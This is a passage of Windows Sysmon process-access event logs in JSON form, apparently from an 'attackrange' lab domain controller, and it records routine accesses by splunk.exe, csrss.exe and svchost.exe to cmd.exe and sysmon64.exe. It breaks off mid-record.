{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-001026A60500}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-001026A60500}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 